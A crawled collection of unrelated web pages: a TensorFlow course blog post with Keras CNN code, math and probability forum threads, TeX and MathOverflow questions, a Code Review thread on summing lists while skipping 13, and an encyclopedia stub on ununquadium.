Why does the output after 1st conv layer change from 28x28 to 26x26? Consider: the filter is 3x3 size, and for each time, it moves 1 pixel to the right (called Stride, check the video).
Let's print the feature maps, i.e. visualize the outputs of each layer:
import matplotlib.pyplot as plt
f, axarr = plt.subplots(3,4)
FIRST_IMAGE=0
SECOND_IMAGE=23
THIRD_IMAGE=28
CONVOLUTION_NUMBER = 6
from tensorflow.keras import models
layer_outputs = [layer.output for layer in model.layers]
activation_model = tf.keras.models.Model(inputs = model.input, outputs = layer_outputs)
for x in range(0,4):
f1 = activation_model.predict(test_images[FIRST_IMAGE].reshape(1, 28, 28, 1))[x]
axarr[0,x].imshow(f1[0, : , :, CONVOLUTION_NUMBER], cmap='inferno')
axarr[0,x].grid(False)
f2 = activation_model.predict(test_images[SECOND_IMAGE].reshape(1, 28, 28, 1))[x]
axarr[1,x].imshow(f2[0, : , :, CONVOLUTION_NUMBER], cmap='inferno')
axarr[1,x].grid(False)
f3 = activation_model.predict(test_images[THIRD_IMAGE].reshape(1, 28, 28, 1))[x]
axarr[2,x].imshow(f3[0, : , :, CONVOLUTION_NUMBER], cmap='inferno')
axarr[2,x].grid(False)
The 6th (counting from 0) conv kernel is good at capture the whole shoes:
The 9th conv kernel is good at capture the feature of shoe soles:
What's the idea of convolution? Look at this notebook to have a deeper understanding of how does those "filters" find the "features": Link in Colab or Link in GitHub. Some more interesting filters in Lode's Computer Graphics Tutorial.
The definitions of Convolution and Pooling given in the Quiz are very straight forward:
• Convolution: A technique to isolate features in images
• Pooling: A technique to reduce the informaiton in an image while maintaining features
## Week 4
Lets assume we are trying to distinguish horse pictures from human pictures. To get the datasets from directory, we can use ImageGenerator to load the datasets as following:
ImageGenerator codes to do that:
from tensorflow.keras.preprocessing.image import ImageDataGenerator
train_datagen = ImageDataGenerator(rescale=1./255) // to normalize the data
train_generator = train_datagen.flow_from_directory(
train_dir,
target_size=(300, 300),
batch_size=128, // pass in 128 images as one batch
class_mode='binary'
)
validate_datagen = ImageDataGenerator(rescale=1./255) // to normalize the data
validate_generator = validate_datagen.flow_from_directory(
validate_dir,
target_size=(300, 300),
batch_size=32, // pass in 32 images as one batch
class_mode='binary'
)
It's a common mistake to point the train_dir to the sub-directories. You shoud set the train_dir as the parent directory of the sub-directories which each name is reagrded the label of images that are contained within them.
Then define the model:
model = tf.keras.models.Sequential([
tf.keras.layers.Conv2D(16, (3, 3), activation='relu', input_shape=(300, 300, 3)),
tf.keras.layers.MaxPooling2D(2, 2),
tf.keras.layers.Conv2D(32, (3, 3), activation='relu'),
tf.keras.layers.MaxPooling2D(2, 2),
tf.keras.layers.Conv2D(64, (3, 3), activation='relu'),
tf.keras.layers.MaxPooling2D(2, 2),
tf.keras.layers.Flatten(),
tf.keras.layers.Dense(512, activation='relu'),
tf.keras.layers.Dense(1, activation='sigmoid') // note that we only need 1 neron of 'sigmoid' for the classification of two classes OR 2 nerons of 'softmax'. Yet 'sigmoid' is more efficient for binary classification task.
])
The output shape and parameters are shown as below. Think about: why the output shape of con2d_5 layer is (298, 298, 16) rather than (300, 300, 16) and why the parameters are 448?
The answers of the questions above are:
1. The output of conv layer when padding = 0 and stride = 1 is (pw-fw+1, ph-fh+1, fn), where pw = picture width, fw = filter width, ph = picture height, fh = filter height, fn = filter number.
2. Parameters number for the conv2d_5 layer = fw fh fn pc + b = fw fh fn pc + fw fh fn = 3 3 16 3 + 3 3 * 16 = 448, in which b = bias and pc = picture color channels.
Then compile the model:
from tensorflow.keras.optimizers import RMSprop
model.compile(loss='binary_crossentropy',
optimizer=RMSprop(lr=0.001),
metrics=['acc'])
Note that we are using a new loss called "binary cross-entropy" and a new optimizer called "PMSprop". Click the corresponding links to check out what they are.
When you use generator, remember to use model.fit_generator(...) as well instead of using model.fit(…).
history = model.fit_generator(
train_generator,
steps_per_epoch=8,
epochs=15,
validation_data=validation_generator,
validation_steps=8,
verbose=2
)
The batch size specified in ImageGenerator for training above is 128, the training folder has 1024 pictures, so need 8 steps per epoch. The batch size specified in ImageGenerator for validation above is 32. The validation folder has 256 images, so we will do 8 steps. And the verbose parameter specifies how much to display while training is going on. With it set to 2, we will get a little less animation hiding the epoch progress.
To classify (either horse or human) of an image, here is the prediction codes:
import numpy as np
from google.colab import files // colab specific codes for loading images
from keras.preprocessing import image
uploaded = files.upload()
for fn in uploaded.keys():
# predicting images
path = '/content/' + fn
img = image.load_img(path, target_size=(300, 300))
x = image.img_to_array(img)
x = np.expand_dims(x, axis=0)
images = np.vstack([x])
classes = model.predict(images, batch_size=10)
print(classes[0]) // sigmoid predicts two values add up to 1
if classes[0] > 0.5:
print(fn + " is a human")
else:
print(fn + " is a horse")
Note book for week 4: Link without validation dataset and Link without validation dataset
Can also be accessed from Github:
## Finally, my thoughts
Should you take this coursera course?
Yes, if you... No, if you are...
Didn't have any experience of Tensorflow and want to start writing TF codes within 10 minutes. Familiar with TensorFlow, specifically, used to read TF tutorial, or writing medium size of projects using TF.
Want to using TF as a tool and does not really care about how algorithms behind it work. Want to learn some therotical knowledges on ML.
Have no research experience before, try to learn DL/ML to extend knowlegde boundry. Already doing research in ML/DL (CV, NLP, ASR, etc...), which means you've already used some ML framework even it is not TF. Maybe reading TF tutorial is a better way for you.
May already have some experience in some of the ML/DL areas other than CV. This course has a preference to focus on CV, which may help you to learn the CV field. Already in CV area.
Be careful! Finishing the course is definitely not the end. You may want/need to dig deeper into the theories behind the metaphors the instructor used to describe concepts. For example, in Quizz 1, "What does a loss function do?" The answer given is "Measures how good the current 'guess' is." But think: What does the Mean Squared Error loss look like? How does it measure how good the current 'guess' is? What does 'guess' means here? These knowledge may help you make decision on NN structure, loss function selection, etc. and most interesting: to feel like Deep Learning is at least a grey box instead of a totally black box. 😎
194
TOC
Comments
Write a Comment | 2021-10-23 01:31:06 | {"extraction_info": {"found_math": true, "script_math_tex": 0, "script_math_asciimath": 0, "math_annotations": 0, "math_alttext": 0, "mathml": 0, "mathjax_tag": 0, "mathjax_inline_tex": 0, "mathjax_display_tex": 0, "mathjax_asciimath": 1, "img_math": 0, "codecogs_latex": 0, "wp_latex": 0, "mimetex.cgi": 0, "/images/math/codecogs": 0, "mathtex.cgi": 0, "katex": 0, "math-container": 0, "wp-katex-eq": 0, "align": 0, "equation": 0, "x-ck12": 0, "texerror": 0, "math_score": 0.26008257269859314, "perplexity": 6922.17753400465}, "config": {"markdown_headings": true, "markdown_code": true, "boilerplate_config": {"ratio_threshold": 0.18, "absolute_threshold": 10, "end_threshold": 15, "enable": false}, "remove_buttons": true, "remove_image_figures": true, "remove_link_clusters": true, "table_config": {"min_rows": 2, "min_cols": 3, "format": "plain"}, "remove_chinese": true, "remove_edit_buttons": true, "extract_latex": true}, "warc_path": "s3://commoncrawl/crawl-data/CC-MAIN-2021-43/segments/1634323585537.28/warc/CC-MAIN-20211023002852-20211023032852-00656.warc.gz"} |
http://mathhelpforum.com/calculus/166792-sphere-volume-derivation-correct-variable-integration.html | # Math Help - Sphere volume derivation with the correct variable of integration
1. ## Sphere volume derivation with the correct variable of integration
Hello all,
So I'm trying to figure out why setting up integrals to find volume of a sphere with the correct variable of integration.
For example, for volume,
$\int_{-\frac{\pi}{2}}^{\frac{\pi}{2}} \pi r^2 \cos^2(\theta)d\theta=\frac{\pi r^2}{4}$ does not work.
I believe my teacher explained that it had to do with the $d\theta$ that were in fact small wedges that, in sum, did not produce a sphere. However, the substitution using $x=r*\sin(\theta)$ and $dx=r*\cos(\theta)d\theta$ did produce the correct result, which is actually the same as the conventionally derived (single-variable) shells integral for a sphere:
$\pi \int_{-r}^{r} x \sqrt{r^2-x^2} dx$
Now, shouldn't these integrals be the same, despite the substitution? What was the first integral really solving for- I don't think I can picture it in my head.
Thank you for taking the time to read this post and help me out.
2. Top integral should be cos^3 not squared and you forget a r. Those two integrals aren't the same otherwise.
And the volume of a sphere is $\displaystyle \frac{4\pi r^3}{3}=\pi r^3\int_{\frac{-\pi}{2}}^{\frac{\pi}{2}}\cos^3{(\theta)}d\theta$
3. Actually, you may be right. Do you by any chance know the proper substitution? The first integral was essentially a "washers" integral using $d\theta$ as the variable of integration. I'm actually not sure if is the washers or shells $dx$ integral that results after the substitution.
I changed the 2nd integral in my post to the shells integral, btw.
Thanks so much for helping out!
4. Shell method is of the form:
$\displaystyle 2\pi\int_{a}^{b}p(x)h(x)dx$
5. So I forgot another $r*\cos^(\theta)$ term! But how? I thought I had the general form of shells correct, just:
$\int_{\theta_1}^{\theta_2} \pi r(\theta) d\theta$
and in the 1st integral's case, $r(\theta)=r*\cos(\theta)$, no?
Thanks again.
EDIT: I meant washers, sorry.
6. EDIT to post below: I meant washers for the 1st integral, not shells, sorry.
7. Everything was correct except for forgetting the $r*\cos(\theta)$.
If you would do the integration with $r*\cos(\theta)$, you would obtain your desired results.
8. Shell with x=rsin substitution
$\displaystyle 4\pi r^3\int_{0}^{\frac{\pi}{2}}(\sin{\theta}*\cos^2{\t heta})d\theta=\frac{4\pi r^3}{2}$
Washer with x=rsin substitution
$\displaystyle \pi r^3\int_{\frac{-\pi}{2}}^{\frac{\pi}{2}}\cos^3{\theta}d\theta=\fra c{4\pi r^3}{3}$
9. Hmmm... I distinctly remember my 1st integral the one we used in class and it worked, but I think you are showing me what I should do for the shells method. I think I need the washers method actually.
EDIT: I just saw your reply above, thanks for helping me understand shells using $d\theta$ so much better. But I was wondering if you could still show me washers- thats the one I initially wanted.
10. Originally Posted by progressive
Hmmm... I distinctly remember my 1st integral the one we used in class and it worked, but I think you are showing me what I should do for the shells method. I think I need the washers method actually.
EDIT: I just saw your reply above, thanks for helping me understand shells using $d\theta$ so much better. But I was wondering if you could still show me washers- thats the one I initially wanted.
I edited my post #8 with both methods and with your desired substitutions.
11. I think I get it now. Thanks very much for all your help! | 2015-03-04 09:05:40 | {"extraction_info": {"found_math": true, "script_math_tex": 0, "script_math_asciimath": 0, "math_annotations": 0, "math_alttext": 0, "mathml": 0, "mathjax_tag": 0, "mathjax_inline_tex": 0, "mathjax_display_tex": 0, "mathjax_asciimath": 0, "img_math": 0, "codecogs_latex": 18, "wp_latex": 0, "mimetex.cgi": 0, "/images/math/codecogs": 0, "mathtex.cgi": 0, "katex": 0, "math-container": 0, "wp-katex-eq": 0, "align": 0, "equation": 0, "x-ck12": 0, "texerror": 0, "math_score": 0.9389747977256775, "perplexity": 543.6185839453805}, "config": {"markdown_headings": true, "markdown_code": true, "boilerplate_config": {"ratio_threshold": 0.18, "absolute_threshold": 10, "end_threshold": 5, "enable": true}, "remove_buttons": true, "remove_image_figures": true, "remove_link_clusters": true, "table_config": {"min_rows": 2, "min_cols": 3, "format": "plain"}, "remove_chinese": true, "remove_edit_buttons": true, "extract_latex": true}, "warc_path": "s3://commoncrawl/crawl-data/CC-MAIN-2015-11/segments/1424936463460.96/warc/CC-MAIN-20150226074103-00256-ip-10-28-5-156.ec2.internal.warc.gz"} |
https://tex.stackexchange.com/questions/414287/how-to-hide-remove-a-picture-in-footline-on-title-slide-only-as-a-template-usin | How to hide/remove a picture in footline on title slide only, as a template using beamer class
I am designing a latex template for presentation slides for my company. I use beamer class.
I made the following codes to show a footline on every slide. It is a image on the left, and some words on the right, and the words and image are aligned in the center. However, I want to just remove the image in the title slide.
I have made the following codes
\setbeamertemplate{footline}{%
%
\else
\includegraphics[align=c, height=1.5cm]{sim-ci-logo-2.png}%
\fi
\hfill%
\usebeamercolor[fg]{myfootlinetext}
\insertdate{}\hspace*{2em}
}
However, it does not work properly. In the title page, the image is gone, but the words moved to the bottom edge. See the two screenshots below:
This is the title slide's footline, where the words moved to the bottom edge
This is the normal slide's footline.
Do you know how to keep the words in the title slide in the same position as other slides? Thanks in advance.
Note that I have used \ifnum\insertframenumber=1, assuming title slide is always the first slide. As @samcarter pointed out How to make the end slide use the same background as title page, while the normal slide use different background?, it is usually a bad idea to make such an assumption, but I do not know how to make it. Any suggestion on that is also appreciated.
In exactly the same way as for the background templates, you can have different footlines:
\documentclass{beamer}
\usepackage{tikz}
\defbeamertemplate{background}{special frames}{%
\begin{tikzpicture}
\useasboundingbox (0,0) rectangle(\the\paperwidth,\the\paperheight);
\fill[color=gray] (0,2) rectangle (\the\paperwidth,\the\paperheight);
\end{tikzpicture}
}
\setbeamertemplate{background}{
\begin{tikzpicture}
\fill[white,opacity=1] (0,0) rectangle(\the\paperwidth,\the\paperheight);
\end{tikzpicture}
}
\defbeamertemplate{footline}{special frames}{text for special footline}
\setbeamertemplate{footline}{text for normal footline}
\newcommand{\insertendpage}{%
\setbeamertemplate{background}[special frames]
\setbeamertemplate{footline}[special frames]
\begin{frame}
bla bla
\end{frame}
}
\setbeamertemplate{title page}{%
\setbeamertemplate{background}[special frames]
\setbeamertemplate{footline}[special frames]
\begin{frame}
text text
\end{frame}
}
\begin{document}
\titlepage
\begin{frame}
Slide 2
\end{frame}
\insertendpage
\end{document}
Quick hack: If you don't want to worry about the vertical position, replace the image by some invisible element of the same height, e.g. a \rule{0pt}{1.5cm} | 2019-06-26 14:47:25 | {"extraction_info": {"found_math": true, "script_math_tex": 0, "script_math_asciimath": 0, "math_annotations": 0, "math_alttext": 0, "mathml": 0, "mathjax_tag": 0, "mathjax_inline_tex": 0, "mathjax_display_tex": 0, "mathjax_asciimath": 1, "img_math": 0, "codecogs_latex": 0, "wp_latex": 0, "mimetex.cgi": 0, "/images/math/codecogs": 0, "mathtex.cgi": 0, "katex": 0, "math-container": 0, "wp-katex-eq": 0, "align": 0, "equation": 0, "x-ck12": 0, "texerror": 0, "math_score": 0.7678256034851074, "perplexity": 1492.7577597025806}, "config": {"markdown_headings": false, "markdown_code": true, "boilerplate_config": {"ratio_threshold": 0.18, "absolute_threshold": 10, "end_threshold": 5, "enable": true}, "remove_buttons": true, "remove_image_figures": true, "remove_link_clusters": true, "table_config": {"min_rows": 2, "min_cols": 3, "format": "plain"}, "remove_chinese": true, "remove_edit_buttons": true, "extract_latex": true}, "warc_path": "s3://commoncrawl/crawl-data/CC-MAIN-2019-26/segments/1560628000353.82/warc/CC-MAIN-20190626134339-20190626160339-00167.warc.gz"} |
http://mathhelpforum.com/statistics/200362-probability-arranging-students-into-groups-print.html | # Probability of arranging students into groups
• Jun 25th 2012, 09:43 AM
usagi_killer
Probability of arranging students into groups
http://img821.imageshack.us/img821/3993/questionon.jpg
I am not quite sure of how the book did this question. I did it another way using counting.
Consider students 1, 2, 3, 4 are all in different groups, then there are 12!/(3!)^4 different ways that the other 12 students can be put into groups.
There are 16!/((4!)^4*4!) to put 16 students into 4 groups of 4, the *4! accounting for the overcounting of the order of the groups.
The final probability follows.
However with the book's working, how is P(A_3) = P(A_1 n A_2 n A_3)?
Isn't A_1 n A_2 = A_1?
Since (student 1,2 in different groups) n (student 1, 2, 3 in different groups) = (student 1,2 in different groups) ?
Also how did they get P(A_1) = 12/15?
Like I just don't understand the intuition of how they arrived at the probability.
Thanks.
• Jun 26th 2012, 09:16 AM
mfb
Re: Probability of arranging students into groups
If A_1 and A_2, then (1&2 are in different groups) and (1&2&3 are in different groups), which is equivalent to the latter statement alone. Therefore, P(A_3) = P(A_1 n A_2 n A_3).
Quote:
Also how did they get P(A_1) = 12/15?
Put student 1 in a random group. Now there are 15 open slots, 3 of them are in the same group, 12 in others. Therefore, student 2 has a 12/15 probability to join a different group: P(A_1)=12/15.
In the same way, assume that student 1 and 2 are in different groups (A_1). Now there are 14 slots left, 8 in different groups. Student 3 has a 8/14 probability to join a new group: P(A_2|A_1)=8/14
Assume that students 1&2&3 are in different groups. The probability that student 4 will join the 4th group is 4/13: P(A_3|A_2)=P(A_3|A_2 and A_1)=4/13
Total probability: P=12/15*8/14*4/13=64/455.
I get the same number with your approach.
• Jun 26th 2012, 11:53 AM
Soroban
Re: Probability of arranging students into groups
Hello, usagi_killer!
Quote:
is randomly divided into four groups of four students.
What is the probability that each group includes a graduate student?
Partition the 16 students into 4 ordered groups of 4 students each.
There are: . ${16\choose4,4,4,4} \:=\:\frac{16!}{4!\,4!\,4!\,4!} \:=\:63,\!063,\!000$ ways.
Now place a graduate student in each of the four groups:
. . . . $|\,g\,\_\,\_\,\_\,|\,g\,\_\,\_\,\_\,|\,g\,\_\,\_\, \_\,|\,g\,\_\,\_\,\_\,|$
There are $4!$ ways to place the graduate students.
There are ${12\choose3,3,3,3}$ ways to place the 12 undergrads.
Hence, there are: . $4!\!\cdot\!\frac{12!}{3!\,3!\,3!\,3!} \:=\: 8,\!870,\!400$ desirable partitions.
The proability is: . $\frac{8,\!870,\!400}{63,\!063,\!000} \;=\;\frac{64}{455}$ | 2017-02-23 22:18:12 | {"extraction_info": {"found_math": true, "script_math_tex": 0, "script_math_asciimath": 0, "math_annotations": 0, "math_alttext": 0, "mathml": 0, "mathjax_tag": 0, "mathjax_inline_tex": 0, "mathjax_display_tex": 0, "mathjax_asciimath": 0, "img_math": 0, "codecogs_latex": 6, "wp_latex": 0, "mimetex.cgi": 0, "/images/math/codecogs": 0, "mathtex.cgi": 0, "katex": 0, "math-container": 0, "wp-katex-eq": 0, "align": 0, "equation": 0, "x-ck12": 0, "texerror": 0, "math_score": 0.7159526348114014, "perplexity": 1486.2317881244671}, "config": {"markdown_headings": true, "markdown_code": true, "boilerplate_config": {"ratio_threshold": 0.18, "absolute_threshold": 10, "end_threshold": 15, "enable": true}, "remove_buttons": true, "remove_image_figures": true, "remove_link_clusters": true, "table_config": {"min_rows": 2, "min_cols": 3, "format": "plain"}, "remove_chinese": true, "remove_edit_buttons": true, "extract_latex": true}, "warc_path": "s3://commoncrawl/crawl-data/CC-MAIN-2017-09/segments/1487501171232.43/warc/CC-MAIN-20170219104611-00492-ip-10-171-10-108.ec2.internal.warc.gz"} |
https://mathoverflow.net/questions/326158/satake-correspondence-for-groups-over-finite-field | # Satake correspondence for groups over finite field
I asked the same question in MSE, but I didn't get any answer. So I decided to post it here, too.
In Langlands' program, Satake correspondence gives a correspondence between unramified representation of a reductive group $$G$$ over a local field and conjugacy classes in the Langlands dual group $${}^{L}G$$ whose projection to $$\hat{G}$$ is semisimple and projection to $$W_K$$ is Frob.
In page 11 of this article, there is similar but different correspondence. It gives a bijection between irreducible representations of $$\mathrm{GL}(2, \mathbb{F}_{q})$$ and conjugacy classes of $$\mathrm{GL}(2, \mathbb{F}_{q})$$. Also, the type of the conjugacy class (Jordan form) determines the type of representation (principal series, special, cuspidal, 1-dimensional).
Is there a general theory for such correspondence over finite field? Can we generalize this to arbitrary reductive groups over finite field? If it is, what is the correspondence? In the article, author said that the correspondence is kind of ad hoc, which is not canonical at all. However, if we fix a generator of $$\mathbb{F}_{q}^{\times}$$, than I think it may possible to find some canonical way to do it.
I'm trying to verify this for other cases by using GAP. This is true for $$\mathrm{GL}(2, \mathbb{F}_{q})$$ as in the note, and it seems also true for $$\mathrm{GL}(3, \mathbb{F}_{5})$$. I computed dimension of irreducible representations, size of conjugacy classes, and number of each stuff (number of irreducible representations of given dimension or number of conjugacy classes of given size). GAP give the result that dimensions of irreducible representations are $$[ 1, 30, 31, 96, 124, 125, 155 ]$$ and size of conjugacy classes are $$[ 1, 744, 775, 12000, 14880, 15500, 18600 ]$$ And the correspondence (at least as a set) exists since both of them has $$[ 4, 4, 12, 40, 4, 40, 12 ]$$ many different things.
• I think what you're looking for is called Deligne-Lustzig theory, which, with the work of many people over a few decades, culminates in a classification of the irreducible representations of finite reductive groups. Carter's Finite groups of Lie type: Conjugacy classes and complex characters is an excellent introduction textbook that covers much ground. Digne and Michel's Representations of Finite Groups of Lie Type is also highly recommended. There are also many related question on MO, such as this one: mathoverflow.net/questions/127691/reconciling-lusztigs – Dror Speiser Mar 23 at 19:47
• @DrorSpeiser Thank you very much! That seems exactly what I wanted. – Seewoo Lee Mar 24 at 15:40 | 2019-07-20 12:43:22 | {"extraction_info": {"found_math": true, "script_math_tex": 0, "script_math_asciimath": 0, "math_annotations": 0, "math_alttext": 0, "mathml": 0, "mathjax_tag": 0, "mathjax_inline_tex": 0, "mathjax_display_tex": 0, "mathjax_asciimath": 1, "img_math": 0, "codecogs_latex": 0, "wp_latex": 0, "mimetex.cgi": 0, "/images/math/codecogs": 0, "mathtex.cgi": 0, "katex": 0, "math-container": 12, "wp-katex-eq": 0, "align": 0, "equation": 0, "x-ck12": 0, "texerror": 0, "math_score": 0.7910225987434387, "perplexity": 186.2243578806606}, "config": {"markdown_headings": true, "markdown_code": true, "boilerplate_config": {"ratio_threshold": 0.3, "absolute_threshold": 10, "end_threshold": 15, "enable": true}, "remove_buttons": true, "remove_image_figures": true, "remove_link_clusters": true, "table_config": {"min_rows": 2, "min_cols": 3, "format": "plain"}, "remove_chinese": true, "remove_edit_buttons": true, "extract_latex": true}, "warc_path": "s3://commoncrawl/crawl-data/CC-MAIN-2019-30/segments/1563195526508.29/warc/CC-MAIN-20190720111631-20190720133631-00197.warc.gz"} |
http://codereview.stackexchange.com/questions/49744/python-address-index-1-with-list-comprehension | # Python address index +1 with list comprehension
Return the sum of the numbers in the array, returning 0 for an empty array. Except the number 13 is very unlucky, so it does not count and numbers that come immediately after a 13 also do not count.
My original answer to the problem:
def sum13(nums):
sum = 0
for idx,val in enumerate(nums):
if val == 13 or (idx != 0 and nums[idx-1] == 13):
pass
else:
sum = sum + val
return sum
Doing this with list comprehension, I came up with
return sum([x if x!=13 and nums[idx-1 if idx >0 else 0] !=13 else 0 for idx,x in enumerate(nums)])
Is there a way to make this cleaner?
-
stackoverflow.com/questions/21303224/… could interest you. I whave no time to write a proper answer but you could probably avoid the outter "else 0" by moving the condition to the right of the list comprehension. – Josay May 14 '14 at 16:54
Rule of thumb: if you have a pass in your code, something is wrong. Python doesn't really need a pass, it's there as a place holder for the "empty group", which is utterly useless except from a purely syntactical point of view. Any code that contains a pass can be trivially changed to something that doesn't have it and is more readable. – Bakuriu May 16 '14 at 12:39
For the record, I think your original answer is quite clean and readable. My only suggestion would be to consider using if not (predicate): (do something), as opposed to if (predicate): pass; else: (do something):
def sum13(nums):
sum = 0
for idx,val in enumerate(nums):
if not (val == 13 or (idx != 0 and nums[idx-1] == 13)):
sum += val
return sum
I like @Josay's suggestion of iterating over pairs of consecutive items. The easiest way to do this is by zipping the list with the list starting from index 1 -- i.e., zip(L, L[1:]). From there, it's just a matter of taking the second item of each pair, unless either of the items == 13. In order to consider the very first item in the list, we'll prepend 0 onto the beginning of the list, so that the first pair is [0, first-item]. In other words, we are going to zip together [0] + L (the list with 0 prepended) and L (the list itself). Here are two slightly different versions of this approach:
def sum13(nums):
sum = 0
for first, second in zip([0] + nums, nums):
if not 13 in (first, second):
sum += second
return sum
Version 2, a functional approach using a list comprehension:
def sum13(nums):
pairs = zip([0] + nums, nums)
allowed = lambda x, y: 13 not in (x, y) # not 13 or following a 13
return sum(y for x, y in pairs if allowed(x, y))
-
lol, we were writing answers at the same time, but it looks like you have a better knowledge of Python than I do. would you let me know if I wrote something syntactically in error? – Malachi May 14 '14 at 18:15
No prob! I left a comment. – Dave Yarwood May 14 '14 at 18:25
thank you, I fixed that in my code. I need to check my logic better, I saw the if statement and just said that was wrong and didn't check the logic that I changed. big no no – Malachi May 14 '14 at 18:28
You don't need the [ ] inside sum( ). I think that just makes an unneeded intermediate list, whereas you can just pass the generator directly to the sum function. – DaoWen May 14 '14 at 20:04
The idiomatic way to get the preceding item while iterating through a list is zip(vals, vals[1:]), it's also quite a bit more efficient than creating a new list. – Voo May 16 '14 at 13:35
EDIT: As pointed out by an anonymous user, my first version did not skip numbers that follow an even number of 13's.
Use an iterator. While you for loop over an iterator you can skip items with next.
def lucky_nums(nums):
nums = iter(nums)
for i in nums:
if i == 13:
while next(nums) == 13:
pass
else:
yield i
print sum(lucky_nums([12,13,14,15]))
-
Good one. Testing this out, I discovered that yield statements are not allowed on codingbat. don't know why... – mcgyver5 May 14 '14 at 21:34
I just saw this error as well Error:Line 8: Yield statements are not allowed. While you may still seek a valid answer that helps you complete this exercise, I encourage you to see using yields is a superior practice. – hexparrot May 15 '14 at 14:51
This is a great solution. FWIW, you could simplify your if statement to if not 13 in [i, next(nums)]: yield i – Dave Yarwood May 16 '14 at 16:14
EDIT: Never mind, that doesn't work. I guess the while loop is what makes this code work, although I don't fully understand it. How does it catch 14 in the example above? Wouldn't it fail to go through the while part because 14 != 13? And yet, I tested the code and it prints 27 as expected. *scratches head* – Dave Yarwood May 16 '14 at 16:25
@DaveYarwood next pulls the next number from the iterator, so it gets skipped even when the comparison fails. – Janne Karila May 16 '14 at 16:27
It's a little "unclean" checking the previous element each time. You can maintain the loop index yourself to avoid this:
def sum13(nums):
sum = i = 0
while i < len(nums):
if nums[i] == 13:
i += 2 # Exclude this element, and the next one too.
else:
sum += nums[i]
i += 1
return sum
This is similar to the iterator/generator answer.
-
I like this answer. Sometimes sticking to the built-in looping structures leads to unnecessary contortions whereas rolling your own gives more concise code. Janne's iterator approach is probably a more pythonic solution, however. – Jack Aidley May 15 '14 at 11:23
another great answer. I was too caught up in sticking to the built-in looping structures. – mcgyver5 May 15 '14 at 14:32
A few simple comments about your original code : you could rewrite if A: pass else do_stuff() without the pass just writing if not A: do_stuff(). In your case, using De Morgan's laws, your code becomes :
def sum13(nums):
sum = 0
for idx,val in enumerate(nums):
if val != 13 and (idx == 0 or nums[idx-1] != 13):
sum = sum + val
return sum
Please note that you have different ways of avoiding accessing the array using indices :
• Save previous item
For instance :
def sum13(nums):
sum = 0
prev = None # or any value different from 13
for val in nums:
if val != 13 and prev != 13:
sum = sum + val
prev = val
return sum
Now, a quick comment about your new code : you are summin x if condition else 0 to sum all values matching the condition. You could just use if in your list comprehension to filter out elements you don't want.
def sum13(nums):
return sum([x if x!=13 and nums[idx-1 if idx >0 else 0] !=13 else 0 for idx,x in enumerate(nums)])
becomes :
def sum13(nums):
return sum([x for idx,x in enumerate(nums) if x!=13 and nums[idx-1 if idx >0 else 0] !=13])
Also, your code creates a temporary list which is not really required. You could simply write :
def sum13(nums):
return sum(x for idx,x in enumerate(nums) if x!=13 and nums[idx-1 if idx >0 else 0] !=13)
Now it seems like an other answer has been given so I don't have much to say.
-
LOL looks like we all had a similar idea for the original code answer. would you look over my syntax, I am learning Python here and there where and when I can. – Malachi May 14 '14 at 18:17
Your code seems to be similar to mine. Therefore, I assume it is write (on the small tests I have written, it seems to be the case) and you have my upvote :) – Josay May 14 '14 at 18:19
check out Dave's comment on my answer. – Malachi May 14 '14 at 18:25
Great minds think alike! @Josay, I'm glad you mentioned the "save previous item in a variable" method -- that's a good option for beginners who haven't quite wrapped their heads around functional programming / list comprehensions. – Dave Yarwood May 14 '14 at 18:31
Noting your initial response to the problem
def sum13(nums):
sum = 0
for idx,val in enumerate(nums):
if val == 13 or (idx != 0 and nums[idx-1] == 13):
pass
else:
sum = sum + val
return sum
you really should write it like this
def sum13(nums):
sum = 0
for idx,val in enumerate(nums):
if not(val == 13 or (idx != 0 and nums[idx-1] == 13)):
sum = sum + val
return sum
there is no reason to add an extra block to an if statement if you don't have to, I know that a lot of people don't like the negatives, but if it is writing a negative if statement or writing an empty if statement, you should write the negative if statement, in this case it is straight to the point
-
You touched on the same thing that I did in my answer :) Your code in the if statement is actually incorrect, though -- it looks like you made all the =='s != and vice versa, rather than putting parentheses around the entire expression and putting not before it, which is what we want (see my answer). The way you have it, the code doesn't work as it's supposed to; for example, it will return true for any number that isn't 13, even if the previous number was 13, in which case we want it to return false. – Dave Yarwood May 14 '14 at 18:22
@DaveYarwood, that makes sense, I didn't even think about checking my logic, which I should have done first and foremost. thanks for the review of my review – Malachi May 14 '14 at 18:25
I have two suggestions.
Make the unlucky number an optional second parameter with a default value of 13. You gain extra flexibility with no additional effort. Doing so also gives the special number a name, which makes your code self-documenting, and it saves you from writing the magic number twice within your function.
If it were not for the special handling for unlucky numbers, the most Pythonic solution would be return sum(nums). I think that a variant of that would be a good way to express the problem. To skip some entries, you'll have to sum an iterator rather than a list. Then you don't have to deal with indexes at all.
def sum_lucky(nums, unlucky_num=13):
def unlucky(num_iter):
try:
next(num_iter) # Consume the next number
finally: # ... but don't fail if nums ends with unlucky_num
return 0
num_iter = iter(nums)
return sum(n if n != unlucky_num else unlucky(num_iter) for n in num_iter)
- | 2016-07-28 18:19:57 | {"extraction_info": {"found_math": true, "script_math_tex": 0, "script_math_asciimath": 0, "math_annotations": 0, "math_alttext": 0, "mathml": 0, "mathjax_tag": 0, "mathjax_inline_tex": 0, "mathjax_display_tex": 0, "mathjax_asciimath": 1, "img_math": 0, "codecogs_latex": 0, "wp_latex": 0, "mimetex.cgi": 0, "/images/math/codecogs": 0, "mathtex.cgi": 0, "katex": 0, "math-container": 0, "wp-katex-eq": 0, "align": 0, "equation": 0, "x-ck12": 0, "texerror": 0, "math_score": 0.4172731935977936, "perplexity": 1939.4241464827644}, "config": {"markdown_headings": true, "markdown_code": true, "boilerplate_config": {"ratio_threshold": 0.18, "absolute_threshold": 10, "end_threshold": 15, "enable": true}, "remove_buttons": true, "remove_image_figures": true, "remove_link_clusters": true, "table_config": {"min_rows": 2, "min_cols": 3, "format": "plain"}, "remove_chinese": true, "remove_edit_buttons": true, "extract_latex": true}, "warc_path": "s3://commoncrawl/crawl-data/CC-MAIN-2016-30/segments/1469257828313.74/warc/CC-MAIN-20160723071028-00189-ip-10-185-27-174.ec2.internal.warc.gz"} |
http://www.chemeurope.com/en/encyclopedia/Ununquadium.html | My watch list
my.chemeurope.com
114 ununtrium ← ununquadium → ununpentium Pb↑Uuq↓(Uhq)
General
Name, Symbol, Number ununquadium, Uuq, 114
Chemical series presumably poor metals
Group, Period, Block 14, 7, p
Appearance unknown, probably silvery
white or metallic gray
Standard atomic weight (298) g·mol−1
Electron configuration perhaps [Rn] 5f14 6d10 7s2 7p2
